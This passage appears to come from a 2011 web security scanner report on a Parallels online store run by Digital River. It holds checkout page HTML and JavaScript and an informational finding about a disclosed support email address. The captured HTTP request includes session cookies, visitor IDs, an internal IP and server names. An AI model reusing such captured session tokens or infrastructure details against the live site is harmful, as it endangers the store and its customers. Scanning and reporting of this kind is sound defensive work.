{window['DrOverlayIframe'].focus();window['DrOverlayIframe'].print();}}).end().find('#dr_overlay_logo > a,li.dr_overlay_about_digital_river > a,li.dr_overlay_privacy_policy > a,li.dr_overlay_terms_and_conditions > a').click(function(){parent.frames[this.target].location.replace(this.href);return false;});};if ($.fn.overlay) {overlaySetup();}else {$.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay-1.1.min.js',dataType: 'script',cache: true,global: false,success: overlaySetup});}}});})(jQuery);</script><p><a class="dr_aboutDigitalRiver" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'aboutDigitalRiver',400,400);return false;" target="DrOverlayIframe">Digital River Inc.</a> is the authorized reseller and merchant of the products and services offered within this store.</p><p><a class="dr_privacyPolicy" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'privacyPolicy',660,400);return false;" target="DrOverlayIframe">Privacy Policy</a>&nbsp;&nbsp;&nbsp;<a class="dr_termsAndConditions" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'termsAndConditions',630,400);return false;" target="DrOverlayIframe">Terms of Sale</a>&nbsp;&nbsp;&nbsp;</p></div>
</form>
</div>
</div>
</div>








<script type="text/javascript">
if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}
</script>
<script type="text/javascript">
$(function(){
   $("div.dr_ExpandPaymentDetailsSection").hide();
   $("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
   });
   $(".dr_expandDetails").click(function(){
$(this).parent().parent().parent().children("div.dr_ExpandPaymentDetailsSection").toggle();
       return false;
   });
});
</script>
<script type="text/javascript">
function CDA_changeFormValue(formElemName,value){
for(i=0; i<document.forms.length; ++i){
formObj = document.forms[i];
formElem = formObj[formElemName];
if(formElem != null){
formElem.value = value;
}
}
}
</script>
<script type="text/javascript">
var now = new Date();
var wo = new Date(now.getFullYear(),0,1,0,0,0,0).getTimezoneOffset();
var so = new Date(now.getFullYear(),6,1,0,0,0,0).getTimezoneOffset();
var co = now.getTimezoneOffset();
var dst = true;
if(wo = so){
dst = false;
}
var value = 'WO=' + wo + '&SO=' + so + '&CO=' + co + '&DST=' + dst;
CDA_changeFormValue('CLS_DATA_ANALYTICS', value)
</script>

</span><!-- /.opDefaultContent -->
<script type="text/javascript">
ptomodule.displayModule('para_ThreePgCheckoutAddressPaymentInfoPage_contentBody');
</script>
















<!-- popUp overlay tags -->
<div class="popup_window_wrapper" style="display:none;position:absolute;">
<div class="popup_window_title_bar_wrapper">
<div class="popup_shadow9"></div>
<div class="popup_title_bar">
<h1 class="popup_title_header"></h1>
<div class="popup_close_button_wrapper">
<div class="popup_button_cover"><a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" alt="Close Window" border="0"/></a></div>
<div class="popup_title_fade"></div><div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_close_button_wrapper -->
</div><!-- /.popup_title_bar -->
<div class="popup_shadow1"></div>
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_window_title_bar_wrapper -->
<div class="popup_middle_wrapper">
<div class="popup_left_shadow_wrapper"><div class="popup_shadow8"></div><div class="popup_shadow7"></div></div><!-- /.popup_left_shadow_wrapper -->
<div class="popup_content_wrapper"><iframe class="popup_content_iframe" src="javascript:false;" scrolling="auto" frameborder="0">Loading...</iframe></div>
<div class="popup_right_shadow_wrapper"><div class="popup_shadow2"></div><div class="popup_shadow3"></div></div><!-- /.popup_right_shadow_wrapper -->
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_middle_wrapper -->
<div class="popup_bottom_bar_wrapper"><div class="popup_shadow6"></div><div class="popup_shadow5"></div><div class="popup_shadow4"></div><div class="popup_clear_it"><!-- --></div></div><!-- /.popup_bottom_bar_wrapper -->
</div><!-- /.popup_window_wrapper -->










<script type="text/javascript">
//if (pageNameFlag=='confirmOrderPage') {
//$('#dr_shipMethod').change(onShippingMethodChange);
//}

if (pageNameFlag=='quickBuyCartPage') {
$("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
});
}
</script>



<script type="text/javascript">
// Function to hide/show info
function hideText(id) {
jQuery('#'+id).toggle();
}
// Function to disable submit button after it has been clicked once already to prevent multiple order submission on CheckoutPayment and ConfirmOrder
function disableButton(button) {
//jQuery(button).hide();
}
// Pull in the overlay verison of popUp on DOM-ready, which will overwrite the old-school function above
if (top === self) { // Don't pull in this code if we're already in a pop-up (iframe)
jQuery(function(){


// Pull in the main CSS for the popUp overlay
       
jQuery.get('/store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage', function(popUpStyle){
jQuery('head').append(popUpStyle);
}, 'html');

// Include browser-specific components
var dataOK = true;
var msie = navigator.userAgent.match(/MSIE (\d+)/);
if (msie) {
var ieVer = parseInt(msie[1]);
if (ieVer < 8) {
dataOK = false;
if ((ieVer < 7) && !jQuery.fn.overlay) { // Include the overlay plugin for IE6
jQuery.ajax({url: '//drh2.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay.min.js', dataType: 'script', cache: true, global: false});
}
}
}
else if (/Firefox\/3\.5/.test(navigator.userAgent)) {
dataOK = false; // FF 3.5 bug #477118
}
// Pull in the draggable popUp overlay script
jQuery.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.draggable.popUp.min.js', dataType: 'script', cache: true, global: false});
// Use embedded data: images for the shadows, if the browser can handle it
if (dataOK) {
jQuery('head').append('<link rel="stylesheet" type="text/css" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/PopUp.Shadows.data.css"/>');
}
});
}
</script>










































<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section2.html"-->
</div></td>
</tr>
<tr>
<td id="copyright"><div class="left">&copy; 1999-2011 Parallels, Inc. All rights reserved.</div><div class="right"></div></td>
</tr>
</table>
<script type="text/javascript">
   var errorMssgs = [];
   $('.dr_error').each(function(i) {
       errorMssgs[i] = $(this).html();
   });
   for (i=0;i<errorMssgs.length;i++) {
       if (errorMssgs[i].indexOf('Enter a valid value') > -1) {
        $('#dr_ThreePgCheckoutAddressPaymentInfo p.dr_requiredFieldsInfo').before('<p id="topError" style="color:red; font-size:12px; font-weight:bold;">Sorry, we have encountered an error. Please check that you have filled in everything correctly below.</p>');
           break;
       }
   }
</script>

<script type="text/javascript">
fc_track = (typeof(fc_track) === 'undefined') ? null : fc_track;
$(function () {
   function op_ChangeBreadcrumbs(argCurrentStep) {
if (argCurrentStep === 'billing') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_on.jpg");
} else if (argCurrentStep === 'review') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_on.jpg");
} else if (argCurrentStep === 'thank_you') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg");
$("#stepFour").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_on.jpg");
}
   }
op_ChangeBreadcrumbs(fc_track);
});
</script>

<script>
// Added by J D April 2010 to customize site
//Updated by J J 5/27/2010 - 8/2010
// Floating security Cert to the right
$('div#dr_geoTrustIcon').css('float','right');
$('div#dr_geoTrustIcon a').css('float','right').css('text-align','right'); //for IE
$('div#dr_geoTrustIcon a img').css('float','right').css('text-align','right'); //for IE

// Re-labelling and repositioning the Upsell Interstitial "Continue" (with purchase) link and
// Re-labelling and repositioning the Upsell Interstitial "Upgrade" button
$('#dr_productUpSell form div#dr_siteButtons').replaceWith('<div id="acceptOfferInput"><input class="dr_acceptOffer" type="submit" value="Upgrade your purchase"/></div><div id="origPurchCont"><a href="/store/para/en_US/DisplayShoppingCartPage">Continue with original purchase</a></div>');

//Remove text from Upsell
$('#dr_productUpSell h1').hide('');
//$('#dr_productUpSell #dr_offer ul li div.dr_product img').hide('');
//$('#dr_productUpSell h2').hide('');
$('#dr_productUpSell #dr_offer ul li div.dr_price').hide('');

// Changing the Continue Shopping Button Text
$('#dr_continueShoppingButton a.dr_button').css('background-color','#ffffff').css('font-size','10px').css('color','#0857A6').css('text-decoration','underline').css('float','left');
$('#dr_continueShoppingButton a.dr_button').html('&#60;&#60; Continue Shopping');

// Floating Credit Cards to the right
$('#creditCardLogos').css('float','right');

// Making Cart Total Bigger
$('td#dr_totals table tr#dr_priceTotal td.dr_price').css('font-size','12px').css('font-family','verdana');

// Removing text breadcrumbs
$('#dr_CheckoutBreadcrumb').hide('');

// Removing link from Product Name
$('#dr_ThreePgCheckoutShoppingCart td.dr_productName a[href!="/store/para/en_US/DisplayPage/id.ExtendedDownloadServiceMerchInfoPage"]').each(function(index) {
$(this).wrap("<span class='dr_productInfo'>"+$(this).html()+"</span>").remove();
});
// Adding rounded borders to Account Login Header
$('#dr_loginContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Account Login Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Billing Info Header
$('#dr_billingContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Billing Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Additional Info Header
$('#dr_optInContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Additional Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Payment Info Header
$('#dr_paymentContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Payment Information</td><td class="rightRound"></td></tr></table>');

// Styling Gray Headers
$('.loginTable').css('background-color','#a0a0a4').css('height','26px');
$('td.leftRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/leftroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','left').css('height','26px').css('font-family','verdana').css('font-size','13px').css('font-weight','bold').css('color','#fff').css('background-color','#a0a0a4');
$('td.rightRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/rightroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','right').css('height','26px').css('width','10px');

// Changing add buttons on Thank You Page
$('#dr_thankYouElementContainer .addOnOffer').css('height','25px');

// Remove refresh button on Quantity
$('#dr_shoppingCartTable input.dr_refreshQtyImage').remove('');

// Styling sub-Cart refresh button
$('input.dr_refreshQtyImage').css('float','right').css('margin','10px 0px 10px 0px');

// Remove remove header
$('th.dr_remove').html('');

// Float the Currency Selector to the right, move it up higher
$('#dr_currencySelector').css('right','10px').css('position','absolute').css('top','10px');

// Float the Checkout Button to the right, move it up higher
$('#dr_checkoutButton').css('right','0px').css('position','absolute').css('top','48px');

// Style the "Estimated Shipping" header
$('div#dr_shippingEst h3.shippingEst').css('background-color','#e6e6e6').css('padding','3px 0px 3px 10px');

// Centering Disclaimer and Changing Font
$('p#dr_cartPricingDisclaimer').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');
$('div#dr_TCFooter').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');

// Adding horizontal rule above the disclaimer
$('<div id="horizontalRule"><hr width="60%" color="#e5e5e5"></div>').insertBefore('p#dr_cartPricingDisclaimer');
$('#horizontalRule').css('width','100%').css('text-align','center').css('margin-top','80px').css('margin-bottom','5px');

// Login Button on Billing Page
$('input#dr_cc_login').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/continueButton.jpg)').css('background-repeat','no-repeat').css('width','77px').css('height','25px');

// Check box to opt-IN for en_US locale
$('#dr_optInEmail div.dr_formLine').replaceWith('<div class="dr_formLine"><label for="optIn" class="dr_label">We would like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" value="on" name="ORIG_VALUE_optIn"/><input type="checkbox" checked="checked" value="on" name="optIn"/></div>');

// Continue Button on Billing Page
$('input#checkoutButton').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','88px').css('height','23px');

// Top Submit Button on Verify Order Page
$('input#submitTop').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Bottom Submit Button on Verify Order Page
$('input#submitBottom').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Change Delivery Method to Delivery
$('table#dr_confirmTbl th.dr_deliveryMethod').html('Delivery');

// Remove border from dr_Content Table on Verify Order Page
$('table.dr_confirmTable').css('border','0px');

// Adding border to the Table
$('#dr_cartTbl > tbody > tr > td:first-child').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/lightGreyPixel.gif)').css('background-repeat','repeat-y');
$('#dr_cartTbl > tbody > tr > td:last-child').css('border-right','1px solid #e5e5e5');
// $('#dr_cartTbl > tbody > tr:last-child > td').css('border-bottom','1px solid #e5e5e5');
$('<tr><td colspan="5" style="padding:0; margin:0"><table width="100%" border="0" class="bottomCurveTable"><tr><td class="leftRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/leftRoundBottom_v2.gif);background-repeat:no-repeat;background-position:0 0;height:9px;width:12px"></td><td class="middleLineBottom" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/middleLineBottom.gif);background-repeat:repeat-x"></td><td class="rightRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/rightRoundBottom_v2.gif);background-repeat:no-repeat;background-position:top right;height:9px;width:12px"></td></tr></table></td></tr>').appendTo('table#dr_cartTbl');

// Reposition the "Order Number" field on the Invoice page
$('<br /><br />').insertBefore('#dr_Invoice span#dr_orderNumber'); // drop below the order date
$('<br />').insertBefore('#dr_Invoice div#dr_billingAddress');// add space between Ord num and bill addr

// Remove the parallels.com cs email link and form
$("#dr_TechnicalAssistance p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_DownloadInformation p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('OR')").remove();
$("#dr_contactFormSection").remove();

// Replace Payment Method dd on Order Info page
$('#dr_OrderInformation dl div.dr_q2 dd').replaceWith('<dd>We accept Visa&#174;, MasterCard&#174;, EuroCard, Discover&#174;, American Express&#174;, and Diner\'s Club&#174;, as well as PayPal, check cards and ATM cards if they are issued by one of these major credit card companies. We also accept checks, money orders, and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order.<p>Our servers encrypt all information submitted to them, so you can be confident that your credit card information will be kept safe and secure.</p></dd>');
// Remove "How do I start a new order?" from "Need Help?" page
$('#dr_Help #dr_helpColumnLeft #dr_orderInformationFAQ ul li.dr_q12').remove();
// Remove "How do I start a new order?" from Order Info page
$('#dr_OrderInformation dl div.dr_q12').remove();
// Replace "Can I order without a credit card?" dd on Order Info page
$('#dr_OrderInformation dl div.dr_q7 dd').replaceWith('<dd>Yes. In addition to credit cards we accept checks, PayPal, money orders and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order. </dd>');

// Change Refund Request URL on "Returns and Cancellations" page
$('#dr_ReturnAndCancellations dl div.dr_q3 dd').replaceWith('<dd>To request a refund, go to <a href="http://www.parallels.com/support" target="_blank">www.parallels.com/support</a>.</dd>');

//Updated Backup CD addon button on shopping cart page

$("#dr_ThreePgCheckoutShoppingCart div.addonDetailsButton a img, div.dr_candyRackChildProduct img.dr_buttonCandyRack").attr("src", "/DRHM/Storefront/Site/para/cm/images/Add_4.gif");

$('#dr_ProductDetails #dr_socialNetworkLinks').hide();

$('div.dr_candyRackChildProduct').insertAfter('h2.hdr-alpha');

</script>

<!--!/esi:include -->











<span class="opDefault" id="opmodule_para_bodyBottom"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyBottom');
</script>









<script type="text/javascript">
var s_account = 'swsdev';
var omnChannel,omnProp2,omnProp4,omnEvents,omnProducts,omnState,omnZip,omnPurchaseID;
var omnPageName='ThreePgCheckoutAddressPaymentInfoPage';

</script>













   







<script type="text/javascript">





var fc_track = "billing";













































</script>
















   
   



   


       <script type="text/javascript">(function(){var cfsTrack = function(){setTimeout(function(){var img = new Image(1,1);img.src = '//7154200626---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif';}, 100);};if (window.attachEvent) {window.attachEvent('onload', cfsTrack);} else {window.addEventListener('load', cfsTrack, false);}})();</script><noscript><img src="//7154200626---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif" height=1 width=1 alt="" border="0" /></noscript>








<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/s_code_20102010.js"></script>
<script type="text/javascript">






/* <form name="analyticsForm" method="post" action="/DRHM/store">
   <input type="hidden" name="Action" value="DisplayShoppingCartPage"/>
   <input type="hidden" name="SiteID" value="para"/>
   <input type="hidden" name="Locale" value="en_US"/>
   <input type="hidden" name="Form" value="com.digitalriver.template.form.ShoppingCartForm"/>
   <input type="hidden" name="CallingPageID" value="ThreePgCheckoutAddressPaymentInfoPage"/>
   <input type="hidden" name="Env" value="BASE"/> */
omnProductName='';





omnProductName+=';[1]SP-SMBPanel: Parallels Small Business Panel for Windows - 1 User,'.replace(/[^A-Za-z0-9 ,;:.]/g, '');

omnPageName='Checkout: Address';
omnChannel='Checkout';
omnProp2='Checkout: Shopping Cart';
omnProp4='Checkout';
omnEvents='scCheckout'
omnProducts=omnProductName;
/* </form> */




</script>
<script type="text/javascript">
       s.pageName=omnPageName
       if (omnChannel) s.channel= omnChannel
       s.currencyCode='USD'
       s.charSet='UTF-8'
       if (omnProp4) s.pageType= omnProp4 // Page Type
       /* Traffice Variables */
       if (omnProp2) s.prop2= omnProp2 //Category
       if (omnProp4) s.prop4= omnProp4 // Page Type
       /* Conversion Variables */
       if (omnState) s.state= omnState
       if (omnZip) s.zip= omnZip
       if (omnEvents) s.events = omnEvents
       if (omnProducts) s.products= omnProducts
       if (omnPurchaseID) s.purchaseID = omnPurchaseID
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_code)
</script>













<!-- ################################ -->
<!-- ### BEGIN Google Custom, TOP ### -->
<script type="text/javascript">
   var _gaq = _gaq || [];

   _gaq.push(['_setAccount', 'UA-363966-1']);
   _gaq.push(['_setDomainName', '.parallels.com']);
   _gaq.push(['_setAllowHash', false]);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();
</script>
<!-- ### END Google Custom, TOP ### -->
<!-- ################################ -->






   <!-- Thank You page and Your Order is Being Processed Page -->

   
       
   


<!-- begin retargeting pixel -->


<script src="https://display.digitalriver.com/?aid=244" type="text/javascript" defer="defer"></script>



<!-- end retargeting pixel -->













</body>
</html>
5. Email addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

5.1. http://store.parallels.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.parallels.com
Path:   /store

Issue detail

The following email address was disclosed in the response:

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage HTTP/1.1
Host: store.parallels.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/small-business-panel/windows/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=ed047e3c47a758dd56638158d4729675; __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.1.10.1299874733; s_cc=true; s_gpv_page=ParallelsSmallBusinessPanelforWindowsEN; s_vnum=1331410733871%26vn%3D1; s_invisit=true; s_nr=1299874733877-New; s_sq=%5B%5BB%5D%5D; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=68351301417,0)
Date: Fri, 11 Mar 2011 20:18:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Content-Length: 42028




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=meta.html"-->
<link rel="icon" href="/DRHM/Storefront/Site/para/cm/images/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/commonFunctions.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/mbox.js"></script>
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=d445603d&Env=BASE&Locale=en_US&SiteID=para&StyleID=26770400&StyleVersion=58&ceid=170596700&cename=TopHeader&id=ThreePgCheckoutShoppingCartPage"-->






<!-- REQUEST ID: TIME=1299866217516:NODE=c1a6104:THREAD=37; ESI Fragment - CREATED: Fri Mar 11 11:56:57 CST 2011 MAX-AGE: 28800+180 -->
<!-- BEGIN TOPHEADER -->
<!-- -->

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Parallels, Inc. (para) Online Store - Shopping Cart</title>
<!-- Accessibility links for Home, Help, and Contents (Sitemap) -->
<link rel="home" href="/store/para/en_US/home" title="Home"/>
<link rel="help" href="/store/para/en_US/help" title="Help"/>
<link rel="contents" href="/store/para/en_US/sitemap" title="Sitemap"/>














<script type="text/javascript">
var q = true; // Page-level global variable

// Temporary popUp function that will be replaced by the overlay-enhanced version when the DOM is fully loaded
function popUp(popURL, popName, popWidth, popHeight) {
self.open(popURL, popName, 'width='+popWidth+',height='+popHeight+',resizable=yes,status=yes,screenX=50,screenY=50,top=50,left=50,scrollbars=yes');
}
</script>






<script type="text/javascript">



if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}

</script>









<script type="text/javascript">
var pageNameFlag = '';
</script>


<!-- Global OT: ptomodule object and browser-detection/cookie-setting -->
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/OTGlobalCode.js"></script>
<script type="text/javascript">
var ot_Country = 'en_US';
</script>
<!-- Site-level OT, from PageBuilder page: OT_globalTrial -->
<script type="text/javascript" src="//atl.img.digitalriver.com/drso/drso-1.4.min.js"></script>
<script type="text/javascript">
if (typeof(optrial) !== 'object') {
optrial = {};
}
//set the cross-domain cookie for NCT Trial Reg test, and delete the download page session cookie (so the sale wil count toward NCT, not download page tests
if (drso.getSessionVar('op612nctfulfill0285001liid').length > 0){
drso.setCookie('op612nctfulfill0285001liid', drso.getSessionVar('op612nctfulfill0285001liid'), drso.getDomain(), null);
drso.deleteCookie('op612downloadparallelsdesktop5formaceliid');
}
</script>
<!-- End of OT_globalTrial -->

<!-- Page-level OT, from OT_ThreePgCheckoutShoppingCartPage_contentBody -->
<script>
optrial.pageName = 'ThreePgCheckoutShoppingCartPage';

// Portfolio: GC-para
// Subject: ThreePgCheckoutShoppingCartPage
(function(){var _o=ptomodule;_o.U="https://ssl.pto.digitalriver.com/by/trial/612/p/threepgcheckoutshoppingcartpage./15/content.js";
_o.ST="script";_o.SA={"type":"text/javascript"};_o.B();_o.R(1000,null,null,null);})();
</script>
<!-- End of OT_ThreePgCheckoutShoppingCartPage_contentBody -->


</head>
<body>


<span class="opDefault" id="opmodule_para_bodyTop"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyTop');
</script>



<!-- END TOPHEADER -->

<!--!/esi:include --><!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section0.html"-->
<!--[if IE]
<style type="text/css">
#dr_productUpSell form div#dr_siteButtons {
margin-top:130px;
}
table#us_buttons {
margin:0px 0px 0px 225px;    
}    
</style>
-->

<table border="0" cellpadding="0" cellspacing="0" width="805" align="center">

<tr>
<td class="logo" width="667px"><h1><a href="//www.parallels.com/" title="Parallels"></a></h1></td>
<td id="secureInfo" width="138px"><!--SECURE-LOGO-->

<!--!/esi:include -->






<!-- REQUEST ID: TIME=1299874692219:NODE=c1a6104:THREAD=71 -->








<div id="dr_geoTrustIcon">
<!-- GeoTrust[tm] Smart Icon tag. Do not edit. -->
<script language="javascript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
<!-- end GeoTrust Smart Icon tag -->
</div>

<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section1.html"-->
       
<!--/SECURE-LOGO-->
</td>

</tr>
<tr>
<td class="breadCrumbsRed" colspan="2"><img src="/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_on.jpg" alt="Step 1 Cart" width="200" height="22" id="stepOne" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg" alt="Step 2 Billing" width="200" height="22" id="stepTwo" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg" alt="Step 3 Verify" width="200" height="22" id="stepThree" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_off.jpg" alt="Step 4 Complete" width="200" height="22" id="stepFour" /></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" class="main" align="center">
<tr>
<td><div id="content">
<!--!/esi:include -->




<span class="opDefaultContent" id="opmodule_para_ThreePgCheckoutShoppingCartPage_contentBody">























<!-- Splash Transformer Optimized -->










<!--..Layout: ThreePgCheckoutShoppingCartPage, Generated: Tue Mar 08 16:04:09 CST 2011..-->
<div xmlns="http://www.w3.org/1999/xhtml">
<div xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" class="dr_Content" id="dr_ThreePgCheckoutShoppingCart">
<h1>Shopping Cart</h1>
<div id="dr_currencySelector">
<form method="get" action="/store/">
<input name="Action" type="hidden" value="DisplayThreePgCheckoutShoppingCartPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutShoppingCartPage"/>
<p>
<strong>Select Currency:</strong>
<select name="currency" onChange="q=false;this.form.submit();">
<option selected="selected">USD</option>
<option>AED</option>
<option>ARS</option>
<option>AUD</option>
